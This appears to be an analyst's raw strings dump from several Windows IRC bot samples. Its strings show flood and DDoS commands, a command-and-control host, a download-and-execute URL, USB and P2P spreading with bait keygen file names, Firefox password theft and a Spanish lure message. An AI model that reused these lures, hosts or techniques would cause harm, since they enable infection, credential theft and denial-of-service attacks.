[UDP]: Flooding %s, On Port: %d, With Delay of: %d(ms), For: %d(s)
[UDP]: Flooding %s, On Port: %d, With Delay of: %d(ms), For: %d(s)
01Starting Flood On %s, On The Fucking Port: %d, For Fucking: %d seconds
01Starting Flood On %s, On The Fucking Port: %d, For Fucking: %d seconds
[SSYN]: Flooding %s:%s for %s seconds.
[SSYN]: Flooding %s:%s for %s seconds.
NhG.gov
NhG.gov
msconfig.exe
msconfig.exe
WindowsUpdate
WindowsUpdate
Block.exe
Block.exe
s.flood
s.flood
NICK
NICK
JOIN
JOIN
root2.zapto.org
root2.zapto.org
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverUpdate
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverUpdate
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverManager
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverManager
hXXp://lab005.comule.com/do/15082010/test5
hXXp://lab005.comule.com/do/15082010/test5
[Speedtest]: %d kB/s
[Speedtest]: %d kB/s
Windows Security Alert
Windows Security Alert
new{BoT-%s-%s}%s
new{BoT-%s-%s}%s
{BoT-%s-%s}%s
{BoT-%s-%s}%s
%d.%d.%d.%d
%d.%d.%d.%d
\google_cache%s.tmp
\google_cache%s.tmp
website=1
website=1
\Desktop.ini
\Desktop.ini
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
usbBlock.exe
usbBlock.exe
icon=%SystemRoot%\system32\SHELL32.dll,2
icon=%SystemRoot%\system32\SHELL32.dll,2
\autorun.inf
\autorun.inf
11Infected Drive %s
11Infected Drive %s
new{BoT-XP-USA}508870
new{BoT-XP-USA}508870
\google_cache2.tmp
\google_cache2.tmp
Ganja145.exe_1436:
.text
.text
`.data
`.data
.rsrc
.rsrc
ADVAPI32.dll
ADVAPI32.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
GDI32.dll
GDI32.dll
USER32.dll
USER32.dll
COMCTL32.dll
COMCTL32.dll
VERSION.dll
VERSION.dll
advapi32.dll
advapi32.dll
advpack.dll
advpack.dll
wininit.ini
wininit.ini
Software\Microsoft\Windows\CurrentVersion\App Paths
Software\Microsoft\Windows\CurrentVersion\App Paths
setupapi.dll
setupapi.dll
setupx.dll
setupx.dll
IXPd.TMP
IXPd.TMP
TMP4351$.TMP
TMP4351$.TMP
FINISHMSG
FINISHMSG
USRQCMD
USRQCMD
ADMQCMD
ADMQCMD
msdownld.tmp
msdownld.tmp
wextract.pdb
wextract.pdb
PSSSSSSh
PSSSSSSh
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
GetWindowsDirectoryA
GetWindowsDirectoryA
ExitWindowsEx
ExitWindowsEx
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
rundll32.exe %s,InstallHinfSection %s 128 %s
rundll32.exe %s,InstallHinfSection %s 128 %s
SHELL32.DLL
SHELL32.DLL
Software\Microsoft\Windows\CurrentVersion\RunOnce
Software\Microsoft\Windows\CurrentVersion\RunOnce
PendingFileRenameOperations
PendingFileRenameOperations
System\CurrentControlSet\Control\Session Manager\FileRenameOperations
System\CurrentControlSet\Control\Session Manager\FileRenameOperations
wextract_cleanup%d
wextract_cleanup%d
%s /D:%s
%s /D:%s
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"
Command.com /c %s
Command.com /c %s
hhh.exe
hhh.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\
33333330
33333330
3333333
3333333
33333333
33333333
~hq.Ol
~hq.Ol
%s,LYR}
%s,LYR}
CG.WT
CG.WT
Ul;y%S
Ul;y%S
.MPcu
.MPcu
4Ys-o}(
4Ys-o}(
%xmvB
%xmvB
Please read the following license agreement. Press the PAGE DOWN key to see the rest of the agreement.
Please read the following license agreement. Press the PAGE DOWN key to see the rest of the agreement.
CFailed to get disk space information from: %s.
CFailed to get disk space information from: %s.
System Message: %s.&A required resource cannot be located. Are you sure you want to cancel?
System Message: %s.&A required resource cannot be located. Are you sure you want to cancel?
8Unable to retrieve operating system version information.!Memory allocation request failed.
8Unable to retrieve operating system version information.!Memory allocation request failed.
Filetable full.Ên not change to destination folder.
Filetable full.Ên not change to destination folder.
Setup could not find a drive with %s KB free disk space to install the program. Please free up some space first and press RETRY or press CANCEL to exit setup.KThat folder is invalid. Please make sure the folder exists and is writable.IYou must specify a folder with fully qualified pathname or choose Cancel.!Could not update folder edit box.5Could not load functions required for browser dialog.7Could not load Shell32.dll required for browser dialog.
Setup could not find a drive with %s KB free disk space to install the program. Please free up some space first and press RETRY or press CANCEL to exit setup.KThat folder is invalid. Please make sure the folder exists and is writable.IYou must specify a folder with fully qualified pathname or choose Cancel.!Could not update folder edit box.5Could not load functions required for browser dialog.7Could not load Shell32.dll required for browser dialog.
(Error creating process . Reason: %s1The cluster size in this system is not supported.,A required resource appears to be corrupted.QWindows 95 or Windows NT 4.0 Beta 2 or greater is required for this installation.
(Error creating process . Reason: %s1The cluster size in this system is not supported.,A required resource appears to be corrupted.QWindows 95 or Windows NT 4.0 Beta 2 or greater is required for this installation.
Error loading %shGetProcAddress() failed on function '%s'. Possible reason: incorrect version of advpack.dll being used./Windows 95 or Windows NT is required to install
Error loading %shGetProcAddress() failed on function '%s'. Possible reason: incorrect version of advpack.dll being used./Windows 95 or Windows NT is required to install
Could not create folder '%s'
Could not create folder '%s'
To install this program, you need %s KB disk space on drive %s. It is recommended that you free up the required disk space before you continue.
To install this program, you need %s KB disk space on drive %s. It is recommended that you free up the required disk space before you continue.
Error retrieving Windows folder
Error retrieving Windows folder
$NT Shutdown: OpenProcessToken error.)NT Shutdown: AdjustTokenPrivileges error.!NT Shutdown: ExitWindowsEx error.}Extracting file failed. It is most likely caused by low memory (low disk space for swapping file) or corrupted Cabinet file.aThe setup program could not retrieve the volume information for drive (%s) .
$NT Shutdown: OpenProcessToken error.)NT Shutdown: AdjustTokenPrivileges error.!NT Shutdown: ExitWindowsEx error.}Extracting file failed. It is most likely caused by low memory (low disk space for swapping file) or corrupted Cabinet file.aThe setup program could not retrieve the volume information for drive (%s) .
System message: %s.xSetup could not find a drive with %s KB free disk space to install the program. Please free up some space and try again.eThe installation program appears to be damaged or corrupted. Contact the vendor of this application.
System message: %s.xSetup could not find a drive with %s KB free disk space to install the program. Please free up some space and try again.eThe installation program appears to be damaged or corrupted. Contact the vendor of this application.
/C: -- Override Install Command defined by author.
/C: -- Override Install Command defined by author.
eAnother copy of the '%s' package is already running on your system. Do you want to run another copy?
eAnother copy of the '%s' package is already running on your system. Do you want to run another copy?
Could not find the file: %s.
Could not find the file: %s.
:The folder '%s' does not exist. Do you want to create it?hAnother copy of the '%s' package is already running on your system. You can only run one copy at a time.OThe '%s' package is not compatible with the version of Windows you are running.SThe '%s' package is not compatible with the version of the file: %s on your system.
:The folder '%s' does not exist. Do you want to create it?hAnother copy of the '%s' package is already running on your system. You can only run one copy at a time.OThe '%s' package is not compatible with the version of Windows you are running.SThe '%s' package is not compatible with the version of the file: %s on your system.
6.00.2900.5512 (xpsp.080413-2105)
6.00.2900.5512 (xpsp.080413-2105)
WEXTRACT.EXE
WEXTRACT.EXE
Windows
Windows
Operating System
Operating System
6.00.2900.5512
6.00.2900.5512
msconfig.exe_1532_rwx_00350000_0000B000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
WS2_32.dll
WS2_32.dll
URLDownloadToFileA
URLDownloadToFileA
urlmon.dll
urlmon.dll
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
ADVAPI32.dll
ADVAPI32.dll
VkKeyScanA
VkKeyScanA
keybd_event
keybd_event
USER32.dll
USER32.dll
MSVCRT.dll
MSVCRT.dll
_acmdln
_acmdln
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
PRIVMSG
PRIVMSG
pong|cmd.exe###
pong|cmd.exe###
udp.stop
udp.stop
rndnick
rndnick
Cerebral botakeylog
Cerebral botakeylog
The One botspread.start
The One botspread.start
Skid placed botsregsrvs.exe
Skid placed botsregsrvs.exe
Older Botschngnick
Older Botschngnick
[FTP]
[FTP]
[Botkiller] Killing Process "%s", Type: "%s"
[Botkiller] Killing Process "%s", Type: "%s"
explorer.exe
explorer.exe
EXPLORER.EXE
EXPLORER.EXE
winlogon.exe
winlogon.exe
csrss.exe
csrss.exe
WINLOGON.EXE
WINLOGON.EXE
services.exe
services.exe
SERVICES.EXE
SERVICES.EXE
%s\%s%i%i.exe
%s\%s%i%i.exe
%s Downloading File From: %s, To: %s
%s Downloading File From: %s, To: %s
%s File Successfully Downloaded To: %s
%s File Successfully Downloaded To: %s
%s Failed To Download File Reason: Insufficient Memory
%s Failed To Download File Reason: Insufficient Memory
%s Failed To Download File Reason: Unknown
%s Failed To Download File Reason: Unknown
%s Successfully Executed: %s
%s Successfully Executed: %s
%s Failed To Execute File via Create Process Reason: Unknown
%s Failed To Execute File via Create Process Reason: Unknown
%appdata%\lsass.exe
%appdata%\lsass.exe
Hola,2012 el fin del mundo ya comprobaron que biene un meteorito y no han dicho nada.aca puedes ver unas imagenes de la nasa de los lugares donde la tierra se esta deteriorando, solo fata un a
Hola,2012 el fin del mundo ya comprobaron que biene un meteorito y no han dicho nada.aca puedes ver unas imagenes de la nasa de los lugares donde la tierra se esta deteriorando, solo fata un a
o.informate en el siguiente enlace
o.informate en el siguiente enlace
BeeSwarm.exe
BeeSwarm.exe
MAPI32.DLL
MAPI32.DLL
*.html
*.html
%s\%s
%s\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
%s:*:Enabled:%s
%s:*:Enabled:%s
Software\Microsoft\Windows\CurrentVersion\Run\
Software\Microsoft\Windows\CurrentVersion\Run\
%s %s
%s %s
%s %s "" "TsGh" :%s
%s %s "" "TsGh" :%s
%s %s %s
%s %s %s
%s %s :%s
%s %s :%s
%s :%s
%s :%s
ganja%s.exe
ganja%s.exe
%s Updating to: %s
%s Updating to: %s
%s Execution Failed!
%s Execution Failed!
%s Dowload Failed!
%s Dowload Failed!
%s Has Been Visited!
%s Has Been Visited!
Windows Live Messenger
Windows Live Messenger
Ganja%s.exe
Ganja%s.exe
[Download]: Executed Successfully
[Download]: Executed Successfully
[UDP]: Flooding %s, On Port: %d, With Delay of: %d(ms), For: %d(s)
[UDP]: Flooding %s, On Port: %d, With Delay of: %d(ms), For: %d(s)
01Starting Flood On %s, On The Fucking Port: %d, For Fucking: %d seconds
01Starting Flood On %s, On The Fucking Port: %d, For Fucking: %d seconds
[SSYN]: Flooding %s:%s for %s seconds.
[SSYN]: Flooding %s:%s for %s seconds.
NhG.gov
NhG.gov
msconfig.exe
msconfig.exe
WindowsUpdate
WindowsUpdate
Block.exe
Block.exe
s.flood
s.flood
NICK
NICK
JOIN
JOIN
root2.zapto.org
root2.zapto.org
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverUpdate
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverUpdate
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverManager
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverManager
hXXp://lab005.comule.com/do/15082010/test5
hXXp://lab005.comule.com/do/15082010/test5
[Speedtest]: %d kB/s
[Speedtest]: %d kB/s
Windows Security Alert
Windows Security Alert
new{BoT-%s-%s}%s
new{BoT-%s-%s}%s
{BoT-%s-%s}%s
{BoT-%s-%s}%s
%d.%d.%d.%d
%d.%d.%d.%d
\google_cache%s.tmp
\google_cache%s.tmp
website=1
website=1
\Desktop.ini
\Desktop.ini
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
usbBlock.exe
usbBlock.exe
icon=%SystemRoot%\system32\SHELL32.dll,2
icon=%SystemRoot%\system32\SHELL32.dll,2
\autorun.inf
\autorun.inf
11Infected Drive %s
11Infected Drive %s
msconfig.exe_1532_rwx_009F0000_0000B000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
WS2_32.dll
WS2_32.dll
URLDownloadToFileA
URLDownloadToFileA
urlmon.dll
urlmon.dll
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
ADVAPI32.dll
ADVAPI32.dll
VkKeyScanA
VkKeyScanA
keybd_event
keybd_event
USER32.dll
USER32.dll
MSVCRT.dll
MSVCRT.dll
_acmdln
_acmdln
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
PRIVMSG
PRIVMSG
pong|cmd.exe###
pong|cmd.exe###
udp.stop
udp.stop
rndnick
rndnick
Cerebral botakeylog
Cerebral botakeylog
The One botspread.start
The One botspread.start
Skid placed botsregsrvs.exe
Skid placed botsregsrvs.exe
Older Botschngnick
Older Botschngnick
[FTP]
[FTP]
[Botkiller] Killing Process "%s", Type: "%s"
[Botkiller] Killing Process "%s", Type: "%s"
explorer.exe
explorer.exe
EXPLORER.EXE
EXPLORER.EXE
winlogon.exe
winlogon.exe
csrss.exe
csrss.exe
WINLOGON.EXE
WINLOGON.EXE
services.exe
services.exe
SERVICES.EXE
SERVICES.EXE
%s\%s%i%i.exe
%s\%s%i%i.exe
%s Downloading File From: %s, To: %s
%s Downloading File From: %s, To: %s
%s File Successfully Downloaded To: %s
%s File Successfully Downloaded To: %s
%s Failed To Download File Reason: Insufficient Memory
%s Failed To Download File Reason: Insufficient Memory
%s Failed To Download File Reason: Unknown
%s Failed To Download File Reason: Unknown
%s Successfully Executed: %s
%s Successfully Executed: %s
%s Failed To Execute File via Create Process Reason: Unknown
%s Failed To Execute File via Create Process Reason: Unknown
%appdata%\lsass.exe
%appdata%\lsass.exe
Hola,2012 el fin del mundo ya comprobaron que biene un meteorito y no han dicho nada.aca puedes ver unas imagenes de la nasa de los lugares donde la tierra se esta deteriorando, solo fata un a
Hola,2012 el fin del mundo ya comprobaron que biene un meteorito y no han dicho nada.aca puedes ver unas imagenes de la nasa de los lugares donde la tierra se esta deteriorando, solo fata un a
o.informate en el siguiente enlace
o.informate en el siguiente enlace
BeeSwarm.exe
BeeSwarm.exe
MAPI32.DLL
MAPI32.DLL
*.html
*.html
%s\%s
%s\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
%s:*:Enabled:%s
%s:*:Enabled:%s
Software\Microsoft\Windows\CurrentVersion\Run\
Software\Microsoft\Windows\CurrentVersion\Run\
%s %s
%s %s
%s %s "" "TsGh" :%s
%s %s "" "TsGh" :%s
%s %s %s
%s %s %s
%s %s :%s
%s %s :%s
%s :%s
%s :%s
ganja%s.exe
ganja%s.exe
%s Updating to: %s
%s Updating to: %s
%s Execution Failed!
%s Execution Failed!
%s Dowload Failed!
%s Dowload Failed!
%s Has Been Visited!
%s Has Been Visited!
Windows Live Messenger
Windows Live Messenger
Ganja%s.exe
Ganja%s.exe
[Download]: Executed Successfully
[Download]: Executed Successfully
[UDP]: Flooding %s, On Port: %d, With Delay of: %d(ms), For: %d(s)
[UDP]: Flooding %s, On Port: %d, With Delay of: %d(ms), For: %d(s)
01Starting Flood On %s, On The Fucking Port: %d, For Fucking: %d seconds
01Starting Flood On %s, On The Fucking Port: %d, For Fucking: %d seconds
[SSYN]: Flooding %s:%s for %s seconds.
[SSYN]: Flooding %s:%s for %s seconds.
NhG.gov
NhG.gov
msconfig.exe
msconfig.exe
WindowsUpdate
WindowsUpdate
Block.exe
Block.exe
s.flood
s.flood
NICK
NICK
JOIN
JOIN
root2.zapto.org
root2.zapto.org
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverUpdate
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverUpdate
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverManager
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverManager
hXXp://lab005.comule.com/do/15082010/test5
hXXp://lab005.comule.com/do/15082010/test5
[Speedtest]: %d kB/s
[Speedtest]: %d kB/s
Windows Security Alert
Windows Security Alert
new{BoT-%s-%s}%s
new{BoT-%s-%s}%s
{BoT-%s-%s}%s
{BoT-%s-%s}%s
%d.%d.%d.%d
%d.%d.%d.%d
\google_cache%s.tmp
\google_cache%s.tmp
website=1
website=1
\Desktop.ini
\Desktop.ini
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
usbBlock.exe
usbBlock.exe
icon=%SystemRoot%\system32\SHELL32.dll,2
icon=%SystemRoot%\system32\SHELL32.dll,2
\autorun.inf
\autorun.inf
11Infected Drive %s
11Infected Drive %s
NESbot.exe_612:
.text
.text
`.rdata
`.rdata
@.data
@.data
VkKeyScanA
VkKeyScanA
keybd_event
keybd_event
EnumWindows
EnumWindows
USER32.dll
USER32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
MSVCRT.dll
MSVCRT.dll
_acmdln
_acmdln
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
ADVAPI32.dll
ADVAPI32.dll
WS2_32.dll
WS2_32.dll
URLDownloadToFileA
URLDownloadToFileA
urlmon.dll
urlmon.dll
\SonyCam03-2008.zip
\SonyCam03-2008.zip
SonyCam03-2008.zip
SonyCam03-2008.zip
SonyCam%d%d%d%d%d%d%d%d%d%d%d.JPG__VVV.photobucket.com
SonyCam%d%d%d%d%d%d%d%d%d%d%d.JPG__VVV.photobucket.com
\temp\syz.tmp
\temp\syz.tmp
gafgatew.tmp
gafgatew.tmp
_023.jpeg-VVV.myspace.com
_023.jpeg-VVV.myspace.com
edonkey2000\incoming\
edonkey2000\incoming\
Windows 2008 Server KeyGen.exe
Windows 2008 Server KeyGen.exe
DeadSpace KeyGen.exe
DeadSpace KeyGen.exe
Half-Life 2 WORKS-ON-STEAM.exe
Half-Life 2 WORKS-ON-STEAM.exe
Left4Dead-STEAM-Online-Crack-WORKS-DECEMBER08.exe
Left4Dead-STEAM-Online-Crack-WORKS-DECEMBER08.exe
Password Cracker.exe
Password Cracker.exe
FTP Cracker.exe
FTP Cracker.exe
Hotmail Hacker.exe
Hotmail Hacker.exe
Hotmail Cracker.exe
Hotmail Cracker.exe
Norton Anti-Virus 2008 Enterprise Crack.exe
Norton Anti-Virus 2008 Enterprise Crack.exe
Kaspersky 2009 Full Suite Crack.exe
Kaspersky 2009 Full Suite Crack.exe
Microsoft Visual C 6 KeyGen.exe
Microsoft Visual C 6 KeyGen.exe
Microsoft Visual Basic 6 KeyGen.exe
Microsoft Visual Basic 6 KeyGen.exe
Microsoft Visual Studio 6 KeyGen.exe
Microsoft Visual Studio 6 KeyGen.exe
Microsoft Visual Studio 2008 KeyGen.exe
Microsoft Visual Studio 2008 KeyGen.exe
Microsoft Visual Basic 2008 KeyGen.exe
Microsoft Visual Basic 2008 KeyGen.exe
Microsoft Visual C 2008 KeyGen.exe
Microsoft Visual C 2008 KeyGen.exe
MSN Live Password Cracker.exe
MSN Live Password Cracker.exe
AOL Instant Messenger (AIM) Cracker.exe
AOL Instant Messenger (AIM) Cracker.exe
AOL Triton Cracker.exe
AOL Triton Cracker.exe
ICQ Account Cracker.exe
ICQ Account Cracker.exe
AOL Password Cracker.exe
AOL Password Cracker.exe
Counter-Strike KeyGen.exe
Counter-Strike KeyGen.exe
Counter-Strike Source KeyGen.exe
Counter-Strike Source KeyGen.exe
DivX Pro KeyGen.exe
DivX Pro KeyGen.exe
RuneScape Cracker.exe
RuneScape Cracker.exe
RuneScape Gold Exploit.exe
RuneScape Gold Exploit.exe
Windows XP Keygen
Windows XP Keygen
Windows XP Crack.exe
Windows XP Crack.exe
Windows Vista Keygen
Windows Vista Keygen
Widnows Vista Crack.exe
Widnows Vista Crack.exe
Kaspersky Crck.exe
Kaspersky Crck.exe
Kaspersky Keygen.exe
Kaspersky Keygen.exe
WOW Account Cracker.exe
WOW Account Cracker.exe
Project 7 Private 4.8.exe
Project 7 Private 4.8.exe
Virus Generator.exe
Virus Generator.exe
Virus Maker.exe
Virus Maker.exe
Nod32 Crack.exe
Nod32 Crack.exe
Nod32 Keygen.exe
Nod32 Keygen.exe
Steam Account Stealer.exe
Steam Account Stealer.exe
Myspace Cracker.exe
Myspace Cracker.exe
Myspace Bruteforce.exe
Myspace Bruteforce.exe
Myspace Attack.exe
Myspace Attack.exe
Limewire Pro Downloader.exe
Limewire Pro Downloader.exe
Tcpip Patch.exe
Tcpip Patch.exe
MSN Hacker 2008.exe
MSN Hacker 2008.exe
MSN Hacker 2009.exe
MSN Hacker 2009.exe
AOL Hacker 2008.exe
AOL Hacker 2008.exe
AOL Hacker 2009.exe
AOL Hacker 2009.exe
YIM HAcker 2008.exe
YIM HAcker 2008.exe
YIM HAcker 2009.exe
YIM HAcker 2009.exe
PhotoShop Keygen.exe
PhotoShop Keygen.exe
Adobe Photoshop Keygen.exe
Adobe Photoshop Keygen.exe
Adobe Photoshop Crack.exe
Adobe Photoshop Crack.exe
Photoshop Crack.exe
Photoshop Crack.exe
Adobe Keygen.exe
Adobe Keygen.exe
Adobe Photoshop CS3 Keygen.exe
Adobe Photoshop CS3 Keygen.exe
Adobe Photoshop CS4 KeyGen.exe
Adobe Photoshop CS4 KeyGen.exe
RuneScape 2008 - Newest Exploits.exe
RuneScape 2008 - Newest Exploits.exe
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
%s\%s
%s\%s
keygen
keygen
KeyGen.exe
KeyGen.exe
shlwapi.dll
shlwapi.dll
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
\Desktop.ini
\Desktop.ini
\autorun.inf
\autorun.inf
icon=%SystemRoot%\system32\SHELL32.dll,4
icon=%SystemRoot%\system32\SHELL32.dll,4
ahoo] - Msg & File Sent To: %s Contacts.
ahoo] - Msg & File Sent To: %s Contacts.
%s%d%d%d.JPG.scr
%s%d%d%d.JPG.scr
%s%d%d%d
%s%d%d%d
KeyGen
KeyGen
mozcrt19.dll
mozcrt19.dll
nspr4.dll
nspr4.dll
plds4.dll
plds4.dll
plc4.dll
plc4.dll
nssutil3.dll
nssutil3.dll
sqlite3.dll
sqlite3.dll
softokn3.dll
softokn3.dll
nss3.dll
nss3.dll
PK11_GetInternalKeySlot
PK11_GetInternalKeySlot
PK11_CheckUserPassword
PK11_CheckUserPassword
[Pstore-FF] %s %s:%s
[Pstore-FF] %s %s:%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Application Data\Mozilla\Firefox
Application Data\Mozilla\Firefox
\profiles.ini
\profiles.ini
SOFTWARE\Mozilla\Mozilla Firefox
SOFTWARE\Mozilla\Mozilla Firefox
signons1.txt
signons1.txt
signons2.txt
signons2.txt
signons3.txt
signons3.txt
pstorec.dll
pstorec.dll
%s %s %s:%s
%s %s %s:%s
http:/
http:/
https:/
https:/
kWindows Security Alert
kWindows Security Alert
SbieDll.dll
SbieDll.dll
TCPView - Sysinternals: VVV.sysinternals.com
TCPView - Sysinternals: VVV.sysinternals.com
Process Monitor - Sysinternals: VVV.sysinternals.com
Process Monitor - Sysinternals: VVV.sysinternals.com
Process Explorer - Sysinternals: VVV.sysinternals.com
Process Explorer - Sysinternals: VVV.sysinternals.com
File Monitor - Sysinternals: VVV.sysinternals.com
File Monitor - Sysinternals: VVV.sysinternals.com
SwitchSniffer v1.3.2.0 Registered
SwitchSniffer v1.3.2.0 Registered
SwitchSniffer v1.3.2.0 UnRegistered
SwitchSniffer v1.3.2.0 UnRegistered
Auto Start and Process Viewer : VVV.konradp.com
Auto Start and Process Viewer : VVV.konradp.com
Remote Process Viewer for Windows Networks
Remote Process Viewer for Windows Networks
Process Heap Viewer - VVV.SecurityXploded.com
Process Heap Viewer - VVV.SecurityXploded.com
KERNEL32.DLL
KERNEL32.DLL
TASKMGR.EXE
TASKMGR.EXE
%s gained access..
%s gained access..
%s did not break in..
%s did not break in..
: %s!%s@%s (PM: "%s")
: %s!%s@%s (PM: "%s")
%s fail by: %s!%s@%s (tried: %s)
%s fail by: %s!%s@%s (tried: %s)
%s %s out.
%s %s out.
%s out.
%s out.
%s error: no user at:
%s error: no user at:
%s invalid slot:
%s invalid slot:
%s kill: threads
%s kill: threads
%s no threads
%s no threads
%s killed thread:
%s killed thread:
%s failed kt:
%s failed kt:
%s %s already running: .
%s %s already running: .
%s faild 2 start %s, err: .
%s faild 2 start %s, err: .
%s status: %s.
%s status: %s.
uptime: %s,
uptime: %s,
for: %s.
for: %s.
%s Bot installed on: %s.
%s Bot installed on: %s.
sn] Msg & File Sent To %d Contacts.
sn] Msg & File Sent To %d Contacts.
by: %s!%s@%s
by: %s!%s@%s
%s Advapi.dll Failed
%s Advapi.dll Failed
%s PStore.dll Failed.
%s PStore.dll Failed.
%s Main thread.
%s Main thread.
%s RuC.
%s RuC.
%s mis paramter[s].
%s mis paramter[s].
%s -SECURE-LOCKDOWN-INITIATED- You THOUGHT you had me :)
%s -SECURE-LOCKDOWN-INITIATED- You THOUGHT you had me :)
%s spreading disabled.
%s spreading disabled.
%s Thread Disabled.
%s Thread Disabled.
FIREFOX Threads
FIREFOX Threads
%s ddosing %s:%s/%s secs.
%s ddosing %s:%s/%s secs.
%s unable to start ddos, error: %s
%s unable to start ddos, error: %s
%s %s
%s %s
%s seeding!
%s seeding!
%s unable to download file
%s unable to download file
%s wget: %s location: %s.
%s wget: %s location: %s.
%seraseme_%d%d%d%d%d.exe
%seraseme_%d%d%d%d%d.exe
%s Downloading update from: %s to: %s.
%s Downloading update from: %s to: %s.
%s updating from %s
%s updating from %s
%s Couldn't open file for writing: %s.
%s Couldn't open file for writing: %s.
%s File download: %.1fKB to: %s @ %.1fKB/sec.
%s File download: %.1fKB to: %s @ %.1fKB/sec.
%s Couldn't parse path, error:
%s Couldn't parse path, error:
%s Failed to create process: "%s", error:
%s Failed to create process: "%s", error:
%s Created process: "%s", PID:
%s Created process: "%s", PID:
%s Process Finished: "%s", Total Running Time: %s.
%s Process Finished: "%s", Total Running Time: %s.
%s Update failed: Error executing file: %s.
%s Update failed: Error executing file: %s.
%s Bad URL or DNS Error, error:
%s Bad URL or DNS Error, error:
Ping Timeout? (%d-%d)%d/%d
Ping Timeout? (%d-%d)%d/%d
PASS %s
PASS %s
NICK %s
NICK %s
USER NESv5 * 0 :%s
USER NESv5 * 0 :%s
QUIT %s
QUIT %s
JOIN
JOIN
PRIVMSG
PRIVMSG
NICK
NICK
PONG %s
PONG %s
NOTICE %s :%s
NOTICE %s :%s
PRIVMSG %s :%s
PRIVMSG %s :%s
JOIN %s
JOIN %s
JOIN %s %s
JOIN %s %s
PART %s
PART %s
MODE %s %s
MODE %s %s
MODE %s %s %s
MODE %s %s %s
Torrent 1.8.1
Torrent 1.8.1
%d.%d.%d.%d
%d.%d.%d.%d
kernel32.dll
kernel32.dll
user32.dll
user32.dll
advapi32.dll
advapi32.dll
RegEnumKeyExA
RegEnumKeyExA
ws2_32.dll
ws2_32.dll
wininet.dll
wininet.dll
HttpOpenRequestA
HttpOpenRequestA
HttpSendRequestA
HttpSendRequestA
FtpGetFileA
FtpGetFileA
FtpPutFileA
FtpPutFileA
InternetOpenUrlA
InternetOpenUrlA
InternetCrackUrlA
InternetCrackUrlA
Mozilla/4.0 (compatible)
Mozilla/4.0 (compatible)
netapi32.dll
netapi32.dll
dnsapi.dll
dnsapi.dll
iphlpapi.dll
iphlpapi.dll
GetTcpTable
GetTcpTable
GetUdpTable
GetUdpTable
mpr.dll
mpr.dll
shell32.dll
shell32.dll
ShellExecuteA
ShellExecuteA
odbc32.dll
odbc32.dll
SQLDriverConnect
SQLDriverConnect
SQLSetEnvAttr
SQLSetEnvAttr
SQLExecDirect
SQLExecDirect
SQLAllocHandle
SQLAllocHandle
SQLFreeHandle
SQLFreeHandle
SQLDisconnect
SQLDisconnect
userenv.dll
userenv.dll
psapi.dll
psapi.dll
hXXp://checkip.dyndns.org
hXXp://checkip.dyndns.org
hXXp://VVV.whatismyip.com
hXXp://VVV.whatismyip.com
%s%%s
%s%%s
%s!%s@%s
%s!%s@%s
%s fail nigga. (%s!%s@%s) password: %s.
%s fail nigga. (%s!%s@%s) password: %s.
%s too many users logged in.
%s too many users logged in.
%s logged in.
%s logged in.
NESbot %s thread stopped. (%d thread(s) stopped.)
NESbot %s thread stopped. (%d thread(s) stopped.)
NESbot No %s thread found.
NESbot No %s thread found.
%s\removeMe%i%i%i%i.bat
%s\removeMe%i%i%i%i.bat
del "%s">nul
del "%s">nul
